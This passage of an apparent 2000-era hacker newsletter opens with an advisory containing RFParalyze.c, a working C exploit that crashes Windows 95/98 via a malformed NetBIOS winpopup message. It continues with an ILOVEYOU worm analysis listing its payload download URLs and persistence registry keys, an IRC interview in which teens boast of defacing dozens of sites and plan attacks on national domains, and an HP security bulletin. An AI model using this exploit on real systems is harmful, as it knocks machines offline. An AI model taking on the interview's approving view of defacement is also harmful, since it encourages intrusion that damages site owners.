        http://www.el8.org/adv/05012000_win98_winpopup.txt

--/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\--
/ /
/ e / - el8.org advisory
/ l /
/ 8 / - Evan Brewer
/ . / - Rain Forest Puppy
/ o /
/ r / - Synopsis: Cause undesired effects remotely against
/ g / win9[5,8] through an oddly formed winpopup message.
/ /
--/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\--

Details:

Through a netbios session request packet with a NULL source name,
Windows 9[5,8] show a number of odd responses. Everything from lockups,
reboots and "the blue screen of death", to total loss of network
connectivity.

Note that neither el8 or wiretrip discovered the vulnerability; instead,
a binary-only exploit found in the wild was reversed, and the
demonstration code attached was reconstructed. So it should be noted:

THIS HAS BEEN FOUND IN THE WILD

The vulnerability specifically targets the Messenger service on Windows
9[5,8]. At this point, it's doubtful there's anything more worthy than a
DoS capable. However, any information to the contrary would be
appreciated. :)

Source:

Attached is a quick hack called RFParalyze.c

Greets:

ADM / w00w00 / everyone at el8.org

--/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\--

/*********************************** www.el8.org **** www.wiretrip.net **/

/* - el8.org advisory: RFParalyze.c

   code by rain forest puppy -
   coolness exhibited by Evan Brewer -

   - Usage: RFParalyze

   where is the IP address (duh) of the target (note: not DNS name).
   is the NetBIOS name (again, duh) of the server at the IP address
   given. A kiddie worth his scripts should be able to figure out how
   to lookup the NetBIOS name. Note: NetBIOS name must be in upper case.

   This code was made from a reverse-engineer of 'whisper', a
   binary-only exploit found in the wild.

   I have only tested this code on Linux. Hey, at least it's not in
   perl... ;) -rfp
*/

#include /* It's such a shame to waste */
#include /* this usable space. Instead, */
#include /* we'll just make it more */
#include /* props to the men and women */
#include /* (hi Tabi!) of #!adm and */
#include /* #!w00w00, because they rock */
#include /* so much. And we can't forget*/
#include /* our friends at eEye or */
#include /* Attrition. Oh, +hi Sioda. :) */

/* Magic winpopup message
   This is from \\Beav\beavis and says "yeh yeh"
   Ron and Marty should like the hardcoded values this has ;)
*/
char blowup[]= "\x00\x00\x00\x41\xff\x53\x4d\x42\xd0\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x19\x00\x04\x42\x45\x41\x56\x00\x04\x42\x45\x41\x56\x49"
"\x53\x00\x01\x08\x00\x79\x65\x70\x20\x79\x65\x70\x00\x00";

struct sreq /* little structure of netbios session request */
{
    char first[5];
    char yoname[32];
    char sep[2];
    char myname[32];
    char end[1];
};

void Pad_Name(char *name1, char *name2); /* Thanks Antilove/ADM 4 codez!*/

int main(int argc, char *argv[]){
    char buf[4000], myname[33], yoname[33];
    struct sockaddr_in sin;
    int sox, connex, x;
    struct sreq smbreq;

    printf("RFParalyze -- this code by rfp/ADM/Wiretrip/ and dm/el8/\n");

    if (argc < 3) {
        printf("Usage: RFParalyze \n");
        printf(" --IP must be ip address, not dns\n");
        printf(" --NetBIOS name must be in UPPER CASE\n\n");
        exit(1);}

    printf("Greetz to el8.org, Technotronic, w00w00, USSR, and ADM!\n");

    Pad_Name("WICCA",myname); /* greetz to Simple Nomad/NMRC */
    myname[30]='A'; /* how was Beltaine? :) */
    myname[31]='D';

    Pad_Name(argv[2],yoname);
    yoname[30]='A';
    yoname[31]='D';

    printf("Trying %s as NetBIOS name %s \n",argv[1],argv[2]);

    sin.sin_addr.s_addr = inet_addr(argv[1]);
    sin.sin_family = AF_INET;
    sin.sin_port = htons(139);

    sox = socket(AF_INET,SOCK_STREAM,0);
    if((connex = connect(sox,(struct sockaddr_in *)&sin,sizeof(sin))) < 0){
        perror("Problems connecting: ");
        exit(1);}

    memset(buf,0,4000);

    memcpy(smbreq.first,"\x81\x00\x00\x44\x20",5); /*various netbios stuffz*/
    memcpy(smbreq.sep,"\x00\x20",2); /*no need to worry about*/
    memcpy(smbreq.end,"\x00",1); /*what it does :) */
    strncpy(smbreq.myname,myname,32);
    strncpy(smbreq.yoname,yoname,32);

    write(sox,&smbreq,72); /* send initial request */
    x=read(sox,buf,4000); /* get their response */

    if(x<1){ printf("Problem, didn't get response\n");
        exit(1);}

    if(buf[0]=='\x82') printf("Enemy engaged, going in for the kill...");
    else {printf("We didn't get back the A-OK, bailing.\n");
        exit(1);}

    write(sox,&blowup,72); /* send the magic message >:) */
    x=read(sox,buf,4000); /* we really don't care, but sure */
    close(sox);
    printf("done\n");
}

void Pad_Name(char *name1, char *name2)
{
    char c, c1, c2;
    int i, len;

    len = strlen(name1);
    for (i = 0; i < 16; i++) {
        if (i >= len) {
            c1 = 'C'; c2 = 'A'; /* CA is a space */
        } else {
            c = name1[i];
            c1 = (char)((int)c/16 + (int)'A');
            c2 = (char)((int)c%16 + (int)'A');
        }
        name2[i*2] = c1;
        name2[i*2+1] = c2;
    }
    name2[32] = 0; /* Put in the null ...*/
}

/*********************************** www.el8.org **** www.wiretrip.net **/

-/-\----/-\----/-\----/-\----/-\----/-\---/ fjear the ASCii skillz \---/-\-

@HWA

16.0 [MM] New worm: ILOVEYOU spreads via e-mail attachments
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This email worm originated in the Philippines, when I first became aware
of it Britain was being hit hard by the nuisance, and by late afternoon
the same day it had proliferated across the net to the U.S and Canada I
got a call from my sister at work who had received 16
ILOVEYOU emails at that time, later on the media began reporting it and
in my news emails that were warning of the virus the very same emails
were themselves infected and multiple copies were received. Not 24hrs had
passed before several variations of the insidious pest had appeared such
as the JOKE and VERY FUNNY variations. You'd think we were past this sort
of annoyance but it seems shoddy programming and planning is going to be
a fact of life for a good while to come yet. - Ed

Media:

Source: http://www.securityfocus.com/templates/archive.pike?list=1&msg=20000504095618.N24513@securityfocus.com

To:BugTraq
Subject:ILOVEYOU worm
Date:Wed May 03 2000 18:56:18
Author: Elias Levy
Message-ID:<20000504095618.N24513@securityfocus.com>

A new VB worm is on the loose. This would normally not be bugtraq
material as it exploits no new flaws but it has spread enough that it
warrants some coverage. This is a quick and dirty analysis of what it
does.

The worm spreads via email as an attachment and via IRC as a DCC
download.

The first thing the worm does when executed is save itself to three
different locations. Under the system directory as MSKernel32.vbs and
LOVE-LETTER-FOR-YOU.TXT.vbs and under the windows directory as
Win32DLL.vbs.

It then creates a number of registry entries to execute these programs
when the machine restarts. These entries are:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL

It will also modify Internet Explorer's start page to point to a web page
that downloads a binary called WIN-BUGSFIX.exe. It randomly selects
between four different URLs:

http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe
http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe
http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe
http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe

I've not been able to obtain a copy of the binary to figure out what it
does. This does mean the worm has a dynamic component that may change its
behavior any time the binary is changed and a new one downloaded.

The worm then changes a number of registry keys to run the downloaded
binary and to clean up after itself.

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page about:blank

The worm then creates an HTML file that helps it spread,
LOVE-LETTER-FOR-YOU.HTM. This is the file DCC'ed to others on IRC.

The worm then spreads to all addresses in the Windows Address Book by
sending the file LOVE-LETTER-FOR-YOU.TXT.vbs as an attachment. The email
starts:

kindly check the attached LOVELETTER coming from me.

Then the virus searches for attached drives looking for files with
certain extensions. It overwrites files ending with vbs, and vbe. It
overwrites files ending with js, jse, css, wsh, sct, and hta, and then
renames them to end with vbs. It overwrites files ending with jpg and
jpeg and appends .vbs to their name. It finds files with the name mp3 and
mp3, creates vbs files with the same name and sets the hidden attribute
in the original mp* files.

Then it looks for the mIRC windows IRC client and overwrites the
script.ini file if found. It modifies this file so that it will DCC the
LOVE-LETTER-FOR-YOU.HTM file to any people that join a channel the client
is in.

You can find the source of the worm at:

http://www.securityfocus.com/templates/archive.pike?list=82&msg=3911840F.D7597030@thievco.com&part=.1

--
Elias Levy
SecurityFocus.com
http://www.securityfocus.com/
Si vis pacem, para bellum

-=-

I-Worm.LoveLetter

I-Worm.LoveLetter is Internet worm written in the scripting language
"Visual Basic Script" (VBS). It works only on computers on which the
Windows Scripting Host (WSH) is installed. In Windows 98 and Windows 2000,
WSH is installed by default. The worm performs destructive actions and
sends its copy by E-mail.

Destructive actions

After starting from the VBS file the worm searches all files on all local
and mapped network drivers. For some extensions of filenames the worm
does the following:

VBS, VBE:
Overwrites files with the worm body.

JS, JSE, CSS, VSH, HST, HTA:
Creates a new file with original filename and extension .VBS and deletes
original file.

JPG, JPEG:
Creates new file with extension .VBS (adds this extension to old file
name and extension) (i.e. PIC1.JPG.VBS). Writes worm body to it and
deletes original file.

MP2, MP3:
Creates a new file with extension .VBS (adds to old file name, see above
for details). It writes its body to it and sets the file attribute
"hidden" to the original file.

MIRC32.EXE, MLINK32.EXE, SCRIPT.INI, MIRC.HLP, MIRC.INI:
If one of these files was found the worm creates the file SCRIPT.INI in
the directory where one of the above files resides.

The worm also creates some files with its body in system directory.

MSKERNEL32.VBS, WIN32DLL.VBS, LOVE-LETTER-FOR-YOU.TXT.VBS

It sets appropriate keys in the system registry (Automatic run keys) with
full names of files:

MSKernel32.vbs, Win32DLL.vbs

It adds system registry keys:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL

Spreading via E-mail

The worm sends itself via E-mail. To achieve this the worm sends itself
to each address from address book. It works only when the email program
Outlook 97/98/2000 is installed.

The letter's subject: ILOVEYOU
Message body: kindly check the attached LOVELETTER coming from me.
Attached file name: LOVE-LETTER-FOR-YOU.TXT.vbs

The virus creates a HTML dropper in Windows system directory. The HTML
dropper displays the message:

This HTML file need ActiveX Control
To Enable to read this HTML file
- Please press 'YES' button to Enable ActiveX

After this the dropper creates the MSKERNEL32.VBS with the worm body and
sets it for auto execution from system registry.

@HWA

17.0 [HWA] May 4th 2000: SugarKing interviews ph33r the b33r
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Exclusive interview by HWA staff writer SugarKing
Contact him at: sugaking@gis.net
Or editor at: cruciphux@dok.org

Session Start: Thu May 04 21:15:55 2000
[21:15] *** Now talking in #vivalaresistance
[21:16] lets do this
[21:16] lock the channel
[21:16] no one knows of it
[21:16] i cant
[21:16] lol
[21:16] ok
[21:16] heh
[21:16] one sec bro
[21:16] werd
[21:16] talking to a chick on the phone:)
[21:17] heh
[21:17] hurry mon aint got much time
[21:17] alright
[21:17] logging now
[21:17] aight
[21:17] you guys don't have to answer anything
[21:17] just say no comment:)
[21:17] iight
[21:17] wtf
[21:17] heh
[21:18] Whats up?
[21:18] Yo we gonna start?
[21:18] so how long has ph33r the b33r been a group?
[21:18] we're already starting:)
[21:18] well
[21:18] Ok : )
[21:18] i recruited people from the early october
[21:18] so lets say october
[21:18] ok...
[21:18] I joined probably in december or november
[21:18] Which one was it p4ntera?
[21:18] november
[21:19] k
[21:19] so you started the group, p4ntera?
[21:19] yes
[21:19] any reason?
[21:19] well
[21:19] and what's with the name?
[21:19] because there wasn't much action going around in the underground
[21:19] LoL
[21:19] that name is joax
[21:19] so
[21:19] i wanted people to know the "scene" aint dead
[21:19] the name?
[21:19] lmao
[21:19] well its a LONNNG story
[21:20] Very long
[21:20] heh
[21:20] yeah
[21:20] he told me once
[21:20] Dont wanna hear it again
[21:20] u still wanna hear it?
[21:20] nah that's ok
[21:20] save some time
[21:20] yeah
[21:20] so how many members to date?
[21:20] holy shit
[21:20] loll
[21:20] 14+
[21:20] 15?
[21:20] most are just shadow members
[21:20] who remain in the background
[21:20] Yah
[21:21] Wait let me think
[21:21] Yah 15 or 16 i can remember
[21:21] that's alot
[21:21] yeah
[21:21] u guys know how many sites you've defaced so far?
[21:21] next?
[21:21] another holy shit =)
[21:21] i would say 20+
[21:21] LoL
[21:21] or don't keep count?
[21:21] 20+?
[21:21] yeah
[21:21] I would say 40
[21:22] And many more to come
[21:22] just guessing
[21:22] heh
[21:22] well
[21:22] i dont wanna sound cocky
[21:22] =)
[21:22] why do you guys deface? fame?
[21:22] nah
[21:22] well i like to show people the underground aint dead
[21:22] and well
[21:22] some for fame too
[21:22] but not all
[21:23] what do you mean "the underground aint dead"?
[21:23] Yah i agree
[21:23] hence why we havent defaced the higher up sites
[21:23] well
[21:23] look on attrition
[21:23] mostly frontpage kiddies, or brazilian kids who cant speak
[21:23] english
[21:23] or both
[21:23] hah ya
[21:23] MSADC GALORE
[21:23] i say the 2 go together in the same sentence
[21:23] HAHA
[21:23] da_pest, dont even give em that =)
[21:23] lol
[21:23] Tru dat
[21:24] hah
[21:24] next?
[21:24] you guys afraid of being busted?
[21:24] hell yeah
[21:24] Of course
[21:24] i dont wanna have a friend named backdoor billy
[21:24] then why do you keep defacing?
[21:24] well
[21:24] You think i want bull shit on my record lol
[21:24] we're in it now
[21:24] we can't stop
[21:24] plus i dont wanna
[21:25] ya you can
[21:25] I did
[21:25] don't wanna? why?
[21:25] i cover my tracks well, and i hide myself
[21:25] i like defacing
[21:25] Plus we said we are afraid of gettin caught but i personally enjoy the rush of the chance of getting caught
[21:25] same
[21:25] :)
[21:25] hes right
[21:25] what about ethics?
[21:25] well
[21:25] i did it for awhile
[21:25] i rarely do medical sites
[21:26] but i don't think it's right
[21:26] not needed
[21:26] no msadc
[21:26] eh
[21:26] heh
[21:26] and usually if i feel sorry for the admin
[21:26] i give him the patch
[21:26] if you feel sorry?
[21:26] I think its safe to say NT will be out of PTB for a bit eh p4ntera?
[21:26] haha
[21:26] thats right
[21:26] but now we're going for countries
[21:27] Oh yah
[21:27] countries?
[21:27] as you might have saw, we raped korea pretty bad
[21:27] =)
[21:27] ya i noticed a bit
[21:27] yeah
[21:27] Yah'
[21:27] next is a country that everyone hates
[21:27] we plan to finish it up tommorow (korean sites that is)
[21:27] Yah
[21:28] what about others calling you guys script kiddies and indeed having script kiddies as members
[21:28] We gonna clean up the .kr tomorow eh p4ntera?
[21:28] well
[21:28] not to name any *cough*artech*cough*
[21:28] :)
[21:28] lets not get into artech
[21:28] Ok artech
[21:28] I d liek to say something about him
[21:28] i consider a script kiddie someone who uses scripts and not knows what it actually does
[21:28] sorry like
[21:28] go ahead:)
[21:28] Ok
[21:28] He is basically a frontpage KIDDY
[21:28] yeah
[21:29] yeah I noticed
[21:29] aol kiddie
[21:29] he doesnt even know what NTLM authentication is
[21:29] or
[21:29] how he uses the everyone/guest group to hack with frontpage
[21:29] he just randomly tries sites
[21:29] He dissed p4ntera and I meanwhile we have our own ideas of hax0ring whil he does absolutly frontpage
[21:29] which is pretty fucking lame
[21:29] Ok
[21:29] Go on attrition
[21:29] and look at his hacks
[21:29] Im pretty sure every one of them is NT
[21:29] nah thats not important
[21:29] yeah they are
[21:29] lets move on to something else
[21:29] i don't think he knows what linux is
[21:30] NT can be raped other ways
[21:30] Yah
[21:30] as u saw with what i did
[21:30] But he uses only frontpage
[21:30] yeah
[21:30] Yep
[21:30] that is correct
[21:30] how many memebers code?
[21:30] netbios is a weak fucking protocol
[21:30] well
[21:30] LoL
[21:30] 5-8
[21:30] Very very weak
[21:30] you guys plan on releasing any exploits you may have written?
[21:30] yeas
[21:30] very soon
[21:30] Yep
[21:30] we are probably gonna release some scanners
[21:30] then maybe some exploits
[21:30] Yeah
[21:30] cool
[21:31] depends how much sexor i get in the next few days
[21:31] hah
[21:31] LoL
[21:31] You know ill be getting sex0r from 3r1/\/ lol
[21:31] so all members are generally kids? 15-18?
[21:31] yeah muthafuckas
[21:31] =)
[21:31] no
[21:31] lol
[21:31] we have some universty members
[21:31] but none too old
[21:31] none too young
[21:31] oh
[21:31] around your difference
[21:31] as u said
[21:32] what are you guys trying to prove by defacing?
[21:32] anything?
[21:32] like i said
[21:32] the underground aint dead
[21:32] and
[21:32] that we, as kids, will not take the bullshit the media spews forth
[21:32] about hackers and the like
[21:32] yeah
[21:33] Yep
[21:33] hmm
[21:33] I dont like the stereo types
[21:33] do you guys have a site?
[21:33] not yet
[21:33] we will have one, one of our members needs 2 way cable
[21:33] :P
[21:33] www.b33r.com soon
[21:33] heheh cool
[21:33] Plus we dont even really need one as of this monet
[21:34] moment
[21:34] ya
[21:34] errr.....
[21:34] do you guys plan on ever stop defacing?
[21:34] Me No!
[21:34] Well not for a while at least
[21:35] p4ntera?
[21:35] He is afk
[21:35] oh
[21:35] he is walkin his dog for a sec
[21:35] hah ok
[21:35] He will brb
[21:35] :)
[21:35] i hate dogs
[21:35] they're Pest's:P
[21:35] Why?
[21:35] Like me : )
[21:35] ya
[21:36] I lub puppys
[21:36] :)
[21:36] U gots any other questions?
[21:36] ya, i'm waiting for p4ntera though
[21:36] Oh ok
[21:37] *** p4ntera has quit IRC (Ping timeout)
[21:37] hrm
[21:37] he'll be back
[21:38] Yah
[21:38] so do you use different handles on IRC because you're afraid of getting caught?
[21:38] Not so much getting caught just the fact i dont want to be bothered
[21:39] I dont want some kid to see my defacements and bug me on irc
[21:39] ya
[21:39] how'd you meet p4ntera?
[21:39] but partly because of the illegal activities factor =
[21:39] Honestly we live about a few blocks away from eachother
[21:40] hah cool
[21:40] Yah
[21:40] do you guys talk about your defacements and shit in school?
[21:41] Well we dont have any of the same classes!But if something big is goign down we meet in between classes just to enlighten eachother kinda
[21:41] Shit sorry for my spelling
[21:41] Im just really cold
[21:41] do your friends know that you guys are into computers?
[21:41] heh
[21:41] it's aight
[21:42] Umm... Well some do but I dont think any know im into defacing
[21:42] Me and p4ntera are the only ones out of my cru that are into this shit
[21:42] ya
[21:43] same as me and Clientel
[21:43] cool
[21:43] we have one class together and he doesn't shut the hell up
[21:43] LoL
[21:43] What does he talk about?
[21:44] about his elite defacements
[21:44] haha nah
[21:44] brb man im gonna log on a nother server im lagged
[21:44] he talks about computers in general
[21:44] *** Da_Pest has quit IRC (Quit: Hey! Where'd my controlling terminal go?)
[21:44] aight
[21:45] *** Da_Pest (****@********.***) has joined #vivalaresistance
[21:45] Back!
[21:46] ok
[21:46] where the hell is p4ntera?
[21:46] He walking his damn dog
[21:46] i'll kill it
[21:46] Sorry bout the wait
[21:46] LoL
[21:46] he should be here soon
[21:47] ok
[21:47] sorry for the wait
[21:47] np
[21:48] do u code?
[21:48] yup
[21:48] btw, to set the record, since i'm logging and it's going to be posted
[21:48] I left this group because it was only defacing
[21:49] I didn't want to do it no more
[21:49] Ok...
[21:49] I'll keep my opinion about defacing to myself
[21:49] Why not?
[21:49] but, I'd rather code some nasty shit:)
[21:49] ok gitcha
[21:49] Alot of people dont like defacing
[21:50] But the way I see it...
[21:50] I don't see a need for it
[21:50] If you work fucking hard on a tight ass OBSD server and you been workin on it forever then I think you deserve the credit and so people can see your work
[21:51] *** p4ntera (****@****.*********.******.***.***) has joined #vivalaresistance
[21:51] wb
[21:51] dog walker:P
[21:51] thanks
[21:51] sorry about that
[21:51] hah
[21:51] Yah wb
[21:51] yeah man your mom is rough with the leash
[21:51] she keeps on bitin git
[21:51] loil
[21:51] *biting it
[21:51] anyways
[21:51] =)
[21:51] back to the question
[21:51] do you guys plan on ever stop defacing?
[21:51] yeah anyways
[21:51] maybe
[21:51] when some of us gets booked
[21:52] or we own the world
[21:52] LoL
[21:52] which ever one comes first
[21:52] heh
[21:52] Me never I wont stop
[21:52] yeah he well
[21:52] *will
[21:52] I enjoy it
[21:52] i would just like to add something?
[21:52] if thats alright?
[21:52] go ahead
[21:52] you got the floor:)
[21:52] I will never stop hax0ring and if i do good work thhen I believe it should not go unnoticed
[21:52] you asked whats with the "underground aint dead part"
[21:52] ya
[21:52] well
[21:52] if u noticed last year
[21:53] groups like gH,irc.psychic.com and h4g15 were defacing major websites
[21:53] ya
[21:53] showing there weak security
[21:53] now we got people like "crime boys" and artech defacing websites
[21:53] Exactly
[21:53] and these are the people that will protect potentially high up websites?
[21:53] i dont want my bank card protected by these frontpage kiddies
[21:54] Ok course
[21:54] u know what i mean?
[21:54] yah
[21:54] and the sad part is alot of admins are like that
[21:54] true in a sense
[21:54] yeah thats right they are
[21:54] And i mean alot
[21:54] but what about groups like L0pht, who made their fame without defacing?
[21:54] well
[21:54] they were made in the 80's
[21:54] Like look at all of artechs for god sakes
[21:54] when defacing was unheard of
[21:55] bbs hacking
[21:55] what about now?
[21:55] they did do the potentially "dark" side of hacking
[21:55] they could easily deface now
[21:55] yeah but they outgrown that
[21:55] its kind of a teenage thing
[21:55] so you saying you're gonna outgrow it?
[21:55] fuck when i heard mosthated was 19 i was shocked
[21:55] eventually
[21:55] heh
[21:55] ya
[21:56] I dont think I will
[21:56] until i get booked
[21:56] yeah he will
[21:56] heh
[21:56] anyways
[21:56] Umm...
[21:56] No
[21:56] in my last interview (team echo) one member said (remain nameless) hacking is something that just eventually progresses
[21:56] yeah
[21:56] which is true
[21:56] funny thing is
[21:56] Tru dat
[21:56] we have 2 members of team echo
[21:56] in our group
[21:56] nameless of course
[21:56] ya I know
[21:56] hehe =)
[21:56] well, had
[21:56] had?
[21:56] one got booked
[21:56] they left?
[21:57] who?
[21:57] another one is still in
[21:57] Analognet
[21:57] Analognet was in ph33r the b33r?
[21:57] yep
[21:57] :)
[21:57] dont be so shocked
[21:57] i didn't know
[21:57] u know who taught him how to hack nt?
[21:57] your talking to him right now
[21:57] heh
[21:57] he learned very fast
[21:57] p4ntera is truly 1337 sh1t lol
[21:57] within a month he knew what i knew
[21:57] He taught me alot
[21:58] and became a nt admin
[21:58] damn right negro
[21:58] cool
[21:58] =)
[21:58] I think as a group we are progressing
[21:58] i totally agree
[21:58] 100%
[21:58] so anything we should know about with the future of ph33r the b33r?
[21:58] yeah
[21:58] We are slowly moving are way up to bigger and better things
[21:58] we are going to be big
[21:58] as da_pest is saying
[21:59] And eventually we are gonna pull a gH and own a big ass site
[21:59] we are the only thing that comes close to a good group
[21:59] of course
[21:59] And that will be a grand finale
[21:59] my boys wkD are there with us
[21:59] Yah
[21:59] oh yeah also...don't you think it's dangerous by just randomly pulling in people in the group who could possible be a fed?
[21:59] werd ka0x and BlazinWeed =)
[21:59] no
[21:59] i know my rights
[21:59] too well in fact
[21:59] Same
[21:59] entrapment is a beautifal thing my friend
[21:59] =)
[22:00] Plus we make sure people are legit before they join
[22:00] and thats why we hang on lame networks
[22:00] any last comments? shout out's? flames?
[22:00] cause efnet is like 98% sniffed
[22:00] well
[22:00] i would like to say to sinfony, aka john dough
[22:00] lol
[22:00] DIE
[22:00] that i respect his skills
[22:00] i recently found out he is r3p3nt from dhc, which kinda sucks for me
[22:00] because i respect dhc as a group
[22:00] and him especially
[22:01] even though he flamed us
[22:01] he has his skills
[22:01] but he is still a ass
[22:01] that will likely never change
[22:01] hehe :)
[22:01] heh
[22:01] anything from you, Pest?
[22:01] He is a bigger ass then m4rth4 lol
[22:01] Yah i just gotta say look out bitches cause PTB Is climbing our way up
[22:01] heh
[22:02] And soon we will not be able to be touched
[22:02] i would like to say some more as well
[22:02] that is right
[22:02] these 3rd world countries are our playgrounds
[22:02] once we master our abilities, we are coming for the higher ups
[22:02] Yah
[22:02] that it?:)
[22:02] once we recruit some more members, we are coming
[22:02] you cannot stop it
[22:02] no one can =)
[22:02] Oh Yah
[22:03] and
[22:03] i would like to say
[22:03] Sugarking is one sexy cum muffin
[22:03] =)
[22:03] hahah
[22:03] thanks for the interview d00dz
[22:03] ok
[22:03] heh
[22:04] *** Da_Pest has quit IRC (Quit: Hey! Where'd my controlling terminal go?)
Session Close: Thu May 04 22:04:39 2000

@HWA

xx.x How to get banned from your ISP for *legal* activity in Canada
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Wed, 3 May 2000 12:41:14 -0400
From: abuse@rogers.home.net
To: m*@home.com
Subject: Rogers@Home Network Security Dept. notice - Unauthorized Access Attempt

Dear Mr. XXXXXXXXXX XXXXXX:

It has been brought to our attention that an attempt to gain access/issue
commands to a computer system without the consent of the owner was traced
to your provisioned IP address.
This may be a deliberate attempt to access these computers, or your machine may have been compromised, in either event you must make sure your computer is not used for any prohibited activity. Please look into this and feel free to email us should you have any questions. I have included the logs and or/complaint below. As a result of our investigation, we have also found several servers operating on our network from your connection. As ALL servers are a violation of our End User Agreement, please remove all servers immediately. To avoid any interruption of service, please email us with confirmation once you have permanently removed all servers. Sincerely, Rogers@Home Network Security Dept. http://rogers.home.com/CustomerSupport/Surf-Safe.html Apr 27 02:29:27 crow named[64]: unapproved query from [24.XXX.XXX.XXX].1041 for "version.bind" Apr 26 23:36:43 fionn rpcbind: refused connect from 24.XXX.XXX.XXX to dump() HTTP/1.1 401 Authorization Required Date: Tue, 08 Jan 1980 17:13:46 GMT Server: Apache/1.3.12 (Unix) PHP/4.0RC1 WWW-Authenticate: Basic realm="Intranet" Connection: close Content-Type: text/html; charset=iso-8859-1 @HWA 18.0 [SEC] Security Bulletins Digest May 02nd 2000 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ To:BugTraq Subject:Security Bulletins Digest (fwd) Date:Tue May 02 2000 18:16:22 Author:Justin Tripp Message-ID: ---------- Forwarded message ---------- Date: Wed, 3 May 2000 04:48:08 -0700 (PDT) From: IT Resource Center To: security_info@us-support.external.hp.com Subject: Security Bulletins Digest HP Support Information Digests =============================================================================== o HP Electronic Support Center World Wide Web Service --------------------------------------------------- If you subscribed through the IT Resource Center and would like to be REMOVED from this mailing list, access the IT Resource Center on the World Wide Web at: http://us.itresourcecenter.hp.com/ Login using your IT Resource Center User ID 
and Password. Then select Support Information Digests. You may then unsubscribe from the appropriate digest. =============================================================================== Digest Name: Daily Security Bulletins Digest Created: Wed May 3 3:00:03 PDT 2000 Table of Contents: Document ID Title --------------- ----------- HPSBUX9910-104 Sec. Vulnerability regarding automountd (rev. 01) The documents are listed below. ------------------------------------------------------------------------------- Document ID: HPSBUX9910-104 Date Loaded: 20000502 Title: Sec. Vulnerability regarding automountd (rev. 01) ------------------------------------------------------------------------- **REVISED 01** HEWLETT-PACKARD COMPANY SECURITY BULLETIN: #00104, 21 Oct 99 Last Revised: 2 May 2000 ------------------------------------------------------------------------- The information in the following Security Bulletin should be acted upon as soon as possible. Hewlett-Packard Company will not be liable for any consequences to any customer resulting from customer's failure to fully implement instructions in this Security Bulletin as soon as possible. ------------------------------------------------------------------------- PROBLEM: automountd can run user programs as root. PLATFORM: HP-9000 Series 700/800 HP-UX releases 10.20 and 11.00. DAMAGE: Allows users to gain root privileges SOLUTION: Apply the patches noted below. AVAILABILITY: Patches are now available. CHANGE SUMMARY: This revision contains patch information. ------------------------------------------------------------------------- I. A. Background This problem was originally reported in CERT Advisory CA-99-05, regarding the vulnerability in automountd which allows an intruder to execute arbitrary commands with the privileges of the automountd process. We had previously reported that Hewlett-Packard platforms were not vulnerable; we now have new information showing that we are indeed vulnerable. 

**REVISED 01**
   B.| Fixing the problem
     |
     |   For HP-UX release 11.00 apply PHNE_20371,
     |   for HP-UX release 10.20 apply PHNE_20628.
     |
     |   NOTE: There are various patch dependencies associated with
     |         this patch, and rebooting is required.

   C. To subscribe to automatically receive future NEW HP Security
      Bulletins from the HP IT Resource Center via electronic mail,
      do the following:

      Use your browser to get to the HP IT Resource Center page at:

        http://itrc.hp.com

      Under the heading "Maintenance and Support" click on the link
      "More..." and at the very bottom of that next page, click on
      "Support Information Digests" underneath the heading NOTIFICATIONS.

      Now login on the IT Resource Center Welcome page, using your user
      ID and password (or register for one). You will need to login in
      order to gain access to many areas of the ITRC. Remember to save
      the User ID assigned to you, and your password.

      Once you are on the Support Information Digests Main page, follow
      the instructions there.

      To -subscribe- to future HP Security Bulletins or other Technical
      Digests, click the check box (in the left column) for the
      appropriate digest and then click the "Update Subscriptions" button
      at the bottom of the page.

      To -review- bulletins already released from our archive, simply
      click on the link near the top of the list entitled "HP Security
      Bulletins Archive."

      or

      To -gain access- to the Security Patch Matrix, select the link for
      "The Security Bulletins Archive". Once in the archive the third
      link is to our current Security Patch Matrix. Updated daily, this
      matrix categorizes security patches by platform/OS release, and by
      bulletin topic.

      The security patch matrix is also available via anonymous ftp:

        us-ffs.external.hp.com
        ~ftp/export/patches/hp-ux_patch_matrix

   D.
      To report new security vulnerabilities, send email to

        security-alert@hp.com

      Please encrypt any exploit information using the security-alert
      PGP key, available from your local key server, or by sending a
      message with a -subject- (not body) of 'get key' (no quotes) to
      security-alert@hp.com.

   Permission is granted for copying and circulating this bulletin to
   Hewlett-Packard (HP) customers (or the Internet community) for the
   purpose of alerting them to problems, if and only if, the bulletin is
   not edited or changed in any way, is attributed to HP, and provided
   such reproduction and/or distribution is performed for non-commercial
   purposes.

   Any other use of this information is prohibited. HP is not liable
   for any misuse of this information by any third party.
________________________________________________________________________
